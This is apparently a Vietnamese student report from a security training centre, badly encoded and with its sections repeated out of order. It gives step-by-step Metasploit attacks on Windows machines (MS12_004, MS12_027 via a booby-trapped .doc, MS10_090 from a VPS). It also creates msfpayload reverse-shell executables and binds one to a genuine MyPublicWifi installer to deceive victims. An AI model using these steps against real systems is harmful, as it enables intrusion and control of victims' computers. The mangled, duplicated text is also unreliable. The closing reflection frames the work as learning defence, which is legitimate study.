victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
